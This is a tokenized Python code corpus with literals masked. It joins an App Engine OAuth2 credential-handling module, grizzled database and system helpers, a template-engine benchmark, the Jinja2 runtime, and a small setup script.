audience , <EOL> '<STR_LIT>' : self . scope , <EOL> '<STR_LIT>' : now , <EOL> '<STR_LIT>' : now + <NUM_LIT> , <EOL> '<STR_LIT>' : self . app_name , <EOL> } <EOL> jwt_components = [ base64 . b64encode ( simplejson . dumps ( seg ) ) <EOL> for seg in [ header , claims ] ] <EOL> base_str = "<STR_LIT:.>" . join ( jwt_components ) <EOL> key_name , signature = app_identity . sign_blob ( base_str ) <EOL> jwt_components . append ( base64 . b64encode ( signature ) ) <EOL> return "<STR_LIT:.>" . join ( jwt_components ) <EOL> class FlowProperty ( db . Property ) : <EOL> """<STR_LIT>""" <EOL> data_type = Flow <EOL> def get_value_for_datastore ( self , model_instance ) : <EOL> flow = super ( FlowProperty , <EOL> self ) . get_value_for_datastore ( model_instance ) <EOL> return db . Blob ( pickle . dumps ( flow ) ) <EOL> def make_value_from_datastore ( self , value ) : <EOL> if value is None : <EOL> return None <EOL> return pickle . loads ( value ) <EOL> def validate ( self , value ) : <EOL> if value is not None and not isinstance ( value , Flow ) : <EOL> raise db . BadValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . name , value ) ) <EOL> return super ( FlowProperty , self ) . validate ( value ) <EOL> def empty ( self , value ) : <EOL> return not value <EOL> class CredentialsProperty ( db . Property ) : <EOL> """<STR_LIT>""" <EOL> data_type = Credentials <EOL> def get_value_for_datastore ( self , model_instance ) : <EOL> logging . info ( "<STR_LIT>" + str ( type ( model_instance ) ) ) <EOL> cred = super ( CredentialsProperty , <EOL> self ) . get_value_for_datastore ( model_instance ) <EOL> if cred is None : <EOL> cred = '<STR_LIT>' <EOL> else : <EOL> cred = cred . to_json ( ) <EOL> return db . Blob ( cred ) <EOL> def make_value_from_datastore ( self , value ) : <EOL> logging . info ( "<STR_LIT>" + str ( type ( value ) ) ) <EOL> if value is None : <EOL> return None <EOL> if len ( value ) == <NUM_LIT:0> : <EOL> return None <EOL> try : <EOL> credentials = Credentials . 
new_from_json ( value ) <EOL> except ValueError : <EOL> credentials = None <EOL> return credentials <EOL> def validate ( self , value ) : <EOL> value = super ( CredentialsProperty , self ) . validate ( value ) <EOL> logging . info ( "<STR_LIT>" + str ( type ( value ) ) ) <EOL> if value is not None and not isinstance ( value , Credentials ) : <EOL> raise db . BadValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> ( self . name , value ) ) <EOL> return value <EOL> class StorageByKeyName ( Storage ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , key_name , property_name , cache = None ) : <EOL> """<STR_LIT>""" <EOL> self . _model = model <EOL> self . _key_name = key_name <EOL> self . _property_name = property_name <EOL> self . _cache = cache <EOL> def locked_get ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _cache : <EOL> json = self . _cache . get ( self . _key_name ) <EOL> if json : <EOL> return Credentials . new_from_json ( json ) <EOL> credential = None <EOL> entity = self . _model . get_by_key_name ( self . _key_name ) <EOL> if entity is not None : <EOL> credential = getattr ( entity , self . _property_name ) <EOL> if credential and hasattr ( credential , '<STR_LIT>' ) : <EOL> credential . set_store ( self ) <EOL> if self . _cache : <EOL> self . _cache . set ( self . _key_name , credentials . to_json ( ) ) <EOL> return credential <EOL> def locked_put ( self , credentials ) : <EOL> """<STR_LIT>""" <EOL> entity = self . _model . get_or_insert ( self . _key_name ) <EOL> setattr ( entity , self . _property_name , credentials ) <EOL> entity . put ( ) <EOL> if self . _cache : <EOL> self . _cache . set ( self . _key_name , credentials . to_json ( ) ) <EOL> class CredentialsModel ( db . 
Model ) : <EOL> """<STR_LIT>""" <EOL> credentials = CredentialsProperty ( ) <EOL> class OAuth2Decorator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client_id , client_secret , scope , <EOL> auth_uri = '<STR_LIT>' , <EOL> token_uri = '<STR_LIT>' , <EOL> message = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . flow = OAuth2WebServerFlow ( client_id , client_secret , scope , None , <EOL> auth_uri , token_uri , ** kwargs ) <EOL> self . credentials = None <EOL> self . _request_handler = None <EOL> self . _message = message <EOL> self . _in_error = False <EOL> def _display_error_message ( self , request_handler ) : <EOL> request_handler . response . out . write ( '<STR_LIT>' ) <EOL> request_handler . response . out . write ( self . _message ) <EOL> request_handler . response . out . write ( '<STR_LIT>' ) <EOL> def oauth_required ( self , method ) : <EOL> """<STR_LIT>""" <EOL> def check_oauth ( request_handler , * args ) : <EOL> if self . _in_error : <EOL> self . _display_error_message ( request_handler ) <EOL> return <EOL> user = users . get_current_user ( ) <EOL> if not user : <EOL> request_handler . redirect ( users . create_login_url ( <EOL> request_handler . request . uri ) ) <EOL> return <EOL> self . flow . params [ '<STR_LIT:state>' ] = request_handler . request . url <EOL> self . _request_handler = request_handler <EOL> self . credentials = StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . get ( ) <EOL> if not self . has_credentials ( ) : <EOL> return request_handler . redirect ( self . authorize_url ( ) ) <EOL> try : <EOL> method ( request_handler , * args ) <EOL> except AccessTokenRefreshError : <EOL> return request_handler . redirect ( self . authorize_url ( ) ) <EOL> return check_oauth <EOL> def oauth_aware ( self , method ) : <EOL> """<STR_LIT>""" <EOL> def setup_oauth ( request_handler , * args ) : <EOL> if self . _in_error : <EOL> self . 
_display_error_message ( request_handler ) <EOL> return <EOL> user = users . get_current_user ( ) <EOL> if not user : <EOL> request_handler . redirect ( users . create_login_url ( <EOL> request_handler . request . uri ) ) <EOL> return <EOL> self . flow . params [ '<STR_LIT:state>' ] = request_handler . request . url <EOL> self . _request_handler = request_handler <EOL> self . credentials = StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . get ( ) <EOL> method ( request_handler , * args ) <EOL> return setup_oauth <EOL> def has_credentials ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . credentials is not None and not self . credentials . invalid <EOL> def authorize_url ( self ) : <EOL> """<STR_LIT>""" <EOL> callback = self . _request_handler . request . relative_url ( '<STR_LIT>' ) <EOL> url = self . flow . step1_get_authorize_url ( callback ) <EOL> user = users . get_current_user ( ) <EOL> memcache . set ( user . user_id ( ) , pickle . dumps ( self . flow ) , <EOL> namespace = OAUTH2CLIENT_NAMESPACE ) <EOL> return url <EOL> def http ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . credentials . authorize ( httplib2 . Http ( ) ) <EOL> class OAuth2DecoratorFromClientSecrets ( OAuth2Decorator ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> client_type , client_info = clientsecrets . loadfile ( filename ) <EOL> if client_type not in [ clientsecrets . TYPE_WEB , clientsecrets . TYPE_INSTALLED ] : <EOL> raise InvalidClientSecretsError ( '<STR_LIT>' ) <EOL> super ( OAuth2DecoratorFromClientSecrets , <EOL> self ) . __init__ ( <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> scope , <EOL> client_info [ '<STR_LIT>' ] , <EOL> client_info [ '<STR_LIT>' ] , <EOL> message ) <EOL> except clientsecrets . InvalidClientSecretsError : <EOL> self . _in_error = True <EOL> if message is not None : <EOL> self . 
_message = message <EOL> else : <EOL> self . _message = "<STR_LIT>" <EOL> def oauth2decorator_from_clientsecrets ( filename , scope , message = None ) : <EOL> """<STR_LIT>""" <EOL> return OAuth2DecoratorFromClientSecrets ( filename , scope , message ) <EOL> class OAuth2Handler ( webapp . RequestHandler ) : <EOL> """<STR_LIT>""" <EOL> @ login_required <EOL> def get ( self ) : <EOL> error = self . request . get ( '<STR_LIT:error>' ) <EOL> if error : <EOL> errormsg = self . request . get ( '<STR_LIT>' , error ) <EOL> self . response . out . write ( <EOL> '<STR_LIT>' % errormsg ) <EOL> else : <EOL> user = users . get_current_user ( ) <EOL> flow = pickle . loads ( memcache . get ( user . user_id ( ) , <EOL> namespace = OAUTH2CLIENT_NAMESPACE ) ) <EOL> if flow : <EOL> credentials = flow . step2_exchange ( self . request . params ) <EOL> StorageByKeyName ( <EOL> CredentialsModel , user . user_id ( ) , '<STR_LIT>' ) . put ( credentials ) <EOL> self . redirect ( str ( self . request . get ( '<STR_LIT:state>' ) ) ) <EOL> else : <EOL> pass <EOL> application = webapp . WSGIApplication ( [ ( '<STR_LIT>' , OAuth2Handler ) ] ) <EOL> def main ( ) : <EOL> run_wsgi_app ( application ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = "<STR_LIT>" <EOL> from grizzled . db . base import DBDriver <EOL> BINARY = <NUM_LIT:0> <EOL> NUMBER = <NUM_LIT:1> <EOL> STRING = <NUM_LIT:2> <EOL> DATETIME = <NUM_LIT:3> <EOL> ROWID = <NUM_LIT:4> <EOL> class DummyCursor ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> def execute ( self , statement , parameters = None ) : <EOL> self . rowcount = <NUM_LIT:0> <EOL> self . description = "<STR_LIT>" <EOL> return None <EOL> def fetchone ( self ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> def fetchall ( self ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> def fetchmany ( self , n ) : <EOL> raise ValueError , "<STR_LIT>" <EOL> class DummyDB ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def cursor ( self ) : <EOL> return DummyCursor ( ) <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> def close ( self ) : <EOL> pass <EOL> class DummyDriver ( DBDriver ) : <EOL> """<STR_LIT>""" <EOL> def get_import ( self ) : <EOL> import dummydb <EOL> return dummydb <EOL> def get_display_name ( self ) : <EOL> return "<STR_LIT>" <EOL> def do_connect ( self , <EOL> host = "<STR_LIT:localhost>" , <EOL> port = None , <EOL> user = '<STR_LIT>' , <EOL> password = '<STR_LIT>' , <EOL> database = '<STR_LIT:default>' ) : <EOL> return dummydb . DummyDB ( ) </s>
<s> from __future__ import absolute_import <EOL> import sys <EOL> from grizzled . system import * <EOL> VERSIONS = [ ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) ] <EOL> class TestSys ( object ) : <EOL> def test_version_conversions ( self ) : <EOL> for s , i in VERSIONS : <EOL> yield self . do_one_version_conversion , s , i <EOL> def do_one_version_conversion ( self , string_version , binary_version ) : <EOL> h = python_version ( string_version ) <EOL> s = python_version_string ( binary_version ) <EOL> assert h == binary_version <EOL> assert s == string_version <EOL> def test_current_version ( self ) : <EOL> ensure_version ( sys . hexversion ) <EOL> ensure_version ( python_version_string ( sys . hexversion ) ) <EOL> major , minor , patch , final , rem = sys . version_info <EOL> binary_version = python_version ( '<STR_LIT>' % ( major , minor , patch ) ) <EOL> def test_class_for_name ( self ) : <EOL> cls = class_for_name ( '<STR_LIT>' ) <EOL> got_name = '<STR_LIT>' % ( cls . __module__ , cls . __name__ ) <EOL> assert got_name == '<STR_LIT>' <EOL> try : <EOL> class_for_name ( '<STR_LIT>' ) <EOL> assert False <EOL> except NameError : <EOL> pass <EOL> except ImportError : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from os . path import join , dirname , abspath <EOL> try : <EOL> from cProfile import Profile <EOL> except ImportError : <EOL> from profile import Profile <EOL> from pstats import Stats <EOL> ROOT = abspath ( dirname ( __file__ ) ) <EOL> from random import choice , randrange <EOL> from datetime import datetime <EOL> from timeit import Timer <EOL> from jinja2 import Environment , FileSystemLoader <EOL> from jinja2 . utils import generate_lorem_ipsum <EOL> from mako . lookup import TemplateLookup <EOL> from genshi . template import TemplateLoader as GenshiTemplateLoader <EOL> def dateformat ( x ) : <EOL> return x . strftime ( '<STR_LIT>' ) <EOL> jinja_env = Environment ( loader = FileSystemLoader ( join ( ROOT , '<STR_LIT>' ) ) ) <EOL> jinja_env . filters [ '<STR_LIT>' ] = dateformat <EOL> mako_lookup = TemplateLookup ( directories = [ join ( ROOT , '<STR_LIT>' ) ] ) <EOL> genshi_loader = GenshiTemplateLoader ( [ join ( ROOT , '<STR_LIT>' ) ] ) <EOL> class Article ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> self . href = '<STR_LIT>' % self . id <EOL> self . title = generate_lorem_ipsum ( <NUM_LIT:1> , False , <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> self . user = choice ( users ) <EOL> self . body = generate_lorem_ipsum ( ) <EOL> self . pub_date = datetime . utcfromtimestamp ( randrange ( <NUM_LIT:10> ** <NUM_LIT:9> , <NUM_LIT:2> * <NUM_LIT:10> ** <NUM_LIT:9> ) ) <EOL> self . published = True <EOL> class User ( object ) : <EOL> def __init__ ( self , username ) : <EOL> self . href = '<STR_LIT>' % username <EOL> self . 
username = username <EOL> users = map ( User , [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' ] ) <EOL> articles = map ( Article , range ( <NUM_LIT:20> ) ) <EOL> navigation = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] * <NUM_LIT:5> <EOL> context = dict ( users = users , articles = articles , page_navigation = navigation ) <EOL> jinja_template = jinja_env . get_template ( '<STR_LIT>' ) <EOL> mako_template = mako_lookup . get_template ( '<STR_LIT>' ) <EOL> genshi_template = genshi_loader . load ( '<STR_LIT>' ) <EOL> def test_jinja ( ) : <EOL> jinja_template . render ( context ) <EOL> def test_mako ( ) : <EOL> mako_template . render_unicode ( ** context ) <EOL> from djangoext import django_loader , DjangoContext <EOL> def test_django ( ) : <EOL> django_template = django_loader . get_template ( '<STR_LIT>' ) <EOL> django_template . render ( DjangoContext ( context ) ) <EOL> def test_genshi ( ) : <EOL> genshi_template . generate ( ** context ) . render ( '<STR_LIT:html>' , doctype = '<STR_LIT:html>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . stdout . write ( '<STR_LIT>' ) <EOL> for test in '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' : <EOL> t = Timer ( setup = '<STR_LIT>' % test , <EOL> stmt = '<STR_LIT>' ) <EOL> sys . stdout . write ( '<STR_LIT>' % test ) <EOL> sys . stdout . flush ( ) <EOL> sys . stdout . write ( '<STR_LIT>' % ( test , t . timeit ( number = <NUM_LIT:200> ) / <NUM_LIT:200> ) ) <EOL> if '<STR_LIT>' in sys . argv : <EOL> print '<STR_LIT>' <EOL> p = Profile ( ) <EOL> p . runcall ( test_jinja ) <EOL> stats = Stats ( p ) <EOL> stats . sort_stats ( '<STR_LIT:time>' , '<STR_LIT>' ) <EOL> stats . print_stats ( ) </s>
<s> """<STR_LIT>""" <EOL> from itertools import chain , imap <EOL> from jinja2 . nodes import EvalContext , _context_function_types <EOL> from jinja2 . utils import Markup , partial , soft_unicode , escape , missing , concat , internalcode , next , object_type_repr <EOL> from jinja2 . exceptions import UndefinedError , TemplateRuntimeError , TemplateNotFound <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> to_string = unicode <EOL> identity = lambda x : x <EOL> def markup_join ( seq ) : <EOL> """<STR_LIT>""" <EOL> buf = [ ] <EOL> iterator = imap ( soft_unicode , seq ) <EOL> for arg in iterator : <EOL> buf . append ( arg ) <EOL> if hasattr ( arg , '<STR_LIT>' ) : <EOL> return Markup ( u'<STR_LIT>' ) . join ( chain ( buf , iterator ) ) <EOL> return concat ( buf ) <EOL> def unicode_join ( seq ) : <EOL> """<STR_LIT>""" <EOL> return concat ( imap ( unicode , seq ) ) <EOL> def new_context ( environment , template_name , blocks , vars = None , <EOL> shared = None , globals = None , locals = None ) : <EOL> """<STR_LIT>""" <EOL> if vars is None : <EOL> vars = { } <EOL> if shared : <EOL> parent = vars <EOL> else : <EOL> parent = dict ( globals or ( ) , ** vars ) <EOL> if locals : <EOL> if shared : <EOL> parent = dict ( parent ) <EOL> for key , value in locals . iteritems ( ) : <EOL> if key [ : <NUM_LIT:2> ] == '<STR_LIT>' and value is not missing : <EOL> parent [ key [ <NUM_LIT:2> : ] ] = value <EOL> return Context ( environment , parent , template_name , blocks ) <EOL> class TemplateReference ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , context ) : <EOL> self . __context = context <EOL> def __getitem__ ( self , name ) : <EOL> blocks = self . __context . blocks [ name ] <EOL> return BlockReference ( name , self . 
__context , blocks , <NUM_LIT:0> ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . __context . name <EOL> ) <EOL> class Context ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , environment , parent , name , blocks ) : <EOL> self . parent = parent <EOL> self . vars = { } <EOL> self . environment = environment <EOL> self . eval_ctx = EvalContext ( self . environment , name ) <EOL> self . exported_vars = set ( ) <EOL> self . name = name <EOL> self . blocks = dict ( ( k , [ v ] ) for k , v in blocks . iteritems ( ) ) <EOL> def super ( self , name , current ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> blocks = self . blocks [ name ] <EOL> index = blocks . index ( current ) + <NUM_LIT:1> <EOL> blocks [ index ] <EOL> except LookupError : <EOL> return self . environment . undefined ( '<STR_LIT>' <EOL> '<STR_LIT>' % name , <EOL> name = '<STR_LIT>' ) <EOL> return BlockReference ( name , self , blocks , index ) <EOL> def get ( self , key , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def resolve ( self , key ) : <EOL> """<STR_LIT>""" <EOL> if key in self . vars : <EOL> return self . vars [ key ] <EOL> if key in self . parent : <EOL> return self . parent [ key ] <EOL> return self . environment . undefined ( name = key ) <EOL> def get_exported ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( k , self . vars [ k ] ) for k in self . exported_vars ) <EOL> def get_all ( self ) : <EOL> """<STR_LIT>""" <EOL> return dict ( self . parent , ** self . 
vars ) <EOL> @ internalcode <EOL> def call ( __self , __obj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if __debug__ : <EOL> __traceback_hide__ = True <EOL> if isinstance ( __obj , _context_function_types ) : <EOL> if getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self , ) + args <EOL> elif getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self . eval_ctx , ) + args <EOL> elif getattr ( __obj , '<STR_LIT>' , <NUM_LIT:0> ) : <EOL> args = ( __self . environment , ) + args <EOL> try : <EOL> return __obj ( * args , ** kwargs ) <EOL> except StopIteration : <EOL> return __self . environment . undefined ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def derived ( self , locals = None ) : <EOL> """<STR_LIT>""" <EOL> context = new_context ( self . environment , self . name , { } , <EOL> self . parent , True , None , locals ) <EOL> context . vars . update ( self . vars ) <EOL> context . eval_ctx = self . eval_ctx <EOL> context . blocks . update ( ( k , list ( v ) ) for k , v in self . blocks . iteritems ( ) ) <EOL> return context <EOL> def _all ( meth ) : <EOL> proxy = lambda self : getattr ( self . get_all ( ) , meth ) ( ) <EOL> proxy . __doc__ = getattr ( dict , meth ) . __doc__ <EOL> proxy . __name__ = meth <EOL> return proxy <EOL> keys = _all ( '<STR_LIT>' ) <EOL> values = _all ( '<STR_LIT>' ) <EOL> items = _all ( '<STR_LIT>' ) <EOL> if hasattr ( dict , '<STR_LIT>' ) : <EOL> iterkeys = _all ( '<STR_LIT>' ) <EOL> itervalues = _all ( '<STR_LIT>' ) <EOL> iteritems = _all ( '<STR_LIT>' ) <EOL> del _all <EOL> def __contains__ ( self , name ) : <EOL> return name in self . vars or name in self . parent <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> item = self . resolve ( key ) <EOL> if isinstance ( item , Undefined ) : <EOL> raise KeyError ( key ) <EOL> return item <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> repr ( self . 
get_all ( ) ) , <EOL> self . name <EOL> ) <EOL> try : <EOL> from collections import Mapping <EOL> Mapping . register ( Context ) <EOL> except ImportError : <EOL> pass <EOL> class BlockReference ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , context , stack , depth ) : <EOL> self . name = name <EOL> self . _context = context <EOL> self . _stack = stack <EOL> self . _depth = depth <EOL> @ property <EOL> def super ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _depth + <NUM_LIT:1> >= len ( self . _stack ) : <EOL> return self . _context . environment . undefined ( '<STR_LIT>' % <EOL> self . name , name = '<STR_LIT>' ) <EOL> return BlockReference ( self . name , self . _context , self . _stack , <EOL> self . _depth + <NUM_LIT:1> ) <EOL> @ internalcode <EOL> def __call__ ( self ) : <EOL> rv = concat ( self . _stack [ self . _depth ] ( self . _context ) ) <EOL> if self . _context . eval_ctx . autoescape : <EOL> rv = Markup ( rv ) <EOL> return rv <EOL> class LoopContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , iterable , recurse = None ) : <EOL> self . _iterator = iter ( iterable ) <EOL> self . _recurse = recurse <EOL> self . index0 = - <NUM_LIT:1> <EOL> try : <EOL> self . _length = len ( iterable ) <EOL> except ( TypeError , AttributeError ) : <EOL> self . _length = None <EOL> def cycle ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> if not args : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return args [ self . index0 % len ( args ) ] <EOL> first = property ( lambda x : x . index0 == <NUM_LIT:0> ) <EOL> last = property ( lambda x : x . index0 + <NUM_LIT:1> == x . length ) <EOL> index = property ( lambda x : x . index0 + <NUM_LIT:1> ) <EOL> revindex = property ( lambda x : x . length - x . index0 ) <EOL> revindex0 = property ( lambda x : x . length - x . index ) <EOL> def __len__ ( self ) : <EOL> return self . 
length <EOL> def __iter__ ( self ) : <EOL> return LoopContextIterator ( self ) <EOL> @ internalcode <EOL> def loop ( self , iterable ) : <EOL> if self . _recurse is None : <EOL> raise TypeError ( '<STR_LIT>' <EOL> "<STR_LIT>" ) <EOL> return self . _recurse ( iterable , self . _recurse ) <EOL> __call__ = loop <EOL> del loop <EOL> @ property <EOL> def length ( self ) : <EOL> if self . _length is None : <EOL> iterable = tuple ( self . _iterator ) <EOL> self . _iterator = iter ( iterable ) <EOL> self . _length = len ( iterable ) + self . index0 + <NUM_LIT:1> <EOL> return self . _length <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . index , <EOL> self . length <EOL> ) <EOL> class LoopContextIterator ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , ) <EOL> def __init__ ( self , context ) : <EOL> self . context = context <EOL> def __iter__ ( self ) : <EOL> return self <EOL> def next ( self ) : <EOL> ctx = self . context <EOL> ctx . index0 += <NUM_LIT:1> <EOL> return next ( ctx . _iterator ) , ctx <EOL> class Macro ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , environment , func , name , arguments , defaults , <EOL> catch_kwargs , catch_varargs , caller ) : <EOL> self . _environment = environment <EOL> self . _func = func <EOL> self . _argument_count = len ( arguments ) <EOL> self . name = name <EOL> self . arguments = arguments <EOL> self . defaults = defaults <EOL> self . catch_kwargs = catch_kwargs <EOL> self . catch_varargs = catch_varargs <EOL> self . caller = caller <EOL> @ internalcode <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> arguments = list ( args [ : self . _argument_count ] ) <EOL> off = len ( arguments ) <EOL> if off != self . _argument_count : <EOL> for idx , name in enumerate ( self . arguments [ len ( arguments ) : ] ) : <EOL> try : <EOL> value = kwargs . pop ( name ) <EOL> except KeyError : <EOL> try : <EOL> value = self . 
defaults [ idx - self . _argument_count + off ] <EOL> except IndexError : <EOL> value = self . _environment . undefined ( <EOL> '<STR_LIT>' % name , name = name ) <EOL> arguments . append ( value ) <EOL> if self . caller : <EOL> caller = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if caller is None : <EOL> caller = self . _environment . undefined ( '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) <EOL> arguments . append ( caller ) <EOL> if self . catch_kwargs : <EOL> arguments . append ( kwargs ) <EOL> elif kwargs : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . name , next ( iter ( kwargs ) ) ) ) <EOL> if self . catch_varargs : <EOL> arguments . append ( args [ self . _argument_count : ] ) <EOL> elif len ( args ) > self . _argument_count : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( self . name , len ( self . arguments ) ) ) <EOL> return self . _func ( * arguments ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . name is None and '<STR_LIT>' or repr ( self . name ) <EOL> ) <EOL> class Undefined ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def __init__ ( self , hint = None , obj = missing , name = None , exc = UndefinedError ) : <EOL> self . _undefined_hint = hint <EOL> self . _undefined_obj = obj <EOL> self . _undefined_name = name <EOL> self . _undefined_exception = exc <EOL> @ internalcode <EOL> def _fail_with_undefined_error ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _undefined_hint is None : <EOL> if self . _undefined_obj is missing : <EOL> hint = '<STR_LIT>' % self . _undefined_name <EOL> elif not isinstance ( self . _undefined_name , basestring ) : <EOL> hint = '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . _undefined_name <EOL> ) <EOL> else : <EOL> hint = '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . 
_undefined_name <EOL> ) <EOL> else : <EOL> hint = self . _undefined_hint <EOL> raise self . _undefined_exception ( hint ) <EOL> @ internalcode <EOL> def __getattr__ ( self , name ) : <EOL> if name [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> raise AttributeError ( name ) <EOL> return self . _fail_with_undefined_error ( ) <EOL> __add__ = __radd__ = __mul__ = __rmul__ = __div__ = __rdiv__ = __truediv__ = __rtruediv__ = __floordiv__ = __rfloordiv__ = __mod__ = __rmod__ = __pos__ = __neg__ = __call__ = __getitem__ = __lt__ = __le__ = __gt__ = __ge__ = __int__ = __float__ = __complex__ = __pow__ = __rpow__ = _fail_with_undefined_error <EOL> def __str__ ( self ) : <EOL> return unicode ( self ) . encode ( '<STR_LIT:utf-8>' ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:0> <EOL> def __iter__ ( self ) : <EOL> if <NUM_LIT:0> : <EOL> yield None <EOL> def __nonzero__ ( self ) : <EOL> return False <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> class DebugUndefined ( Undefined ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> def __unicode__ ( self ) : <EOL> if self . _undefined_hint is None : <EOL> if self . _undefined_obj is missing : <EOL> return u'<STR_LIT>' % self . _undefined_name <EOL> return '<STR_LIT>' % ( <EOL> object_type_repr ( self . _undefined_obj ) , <EOL> self . _undefined_name <EOL> ) <EOL> return u'<STR_LIT>' % self . _undefined_hint <EOL> class StrictUndefined ( Undefined ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = ( ) <EOL> __iter__ = __unicode__ = __str__ = __len__ = __nonzero__ = __eq__ = __ne__ = __bool__ = Undefined . _fail_with_undefined_error <EOL> del Undefined . __slots__ , DebugUndefined . __slots__ , StrictUndefined . __slots__ </s>
<s> from distutils . core import setup <EOL> setup ( name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = '''<STR_LIT>''' , <EOL> ) </s>
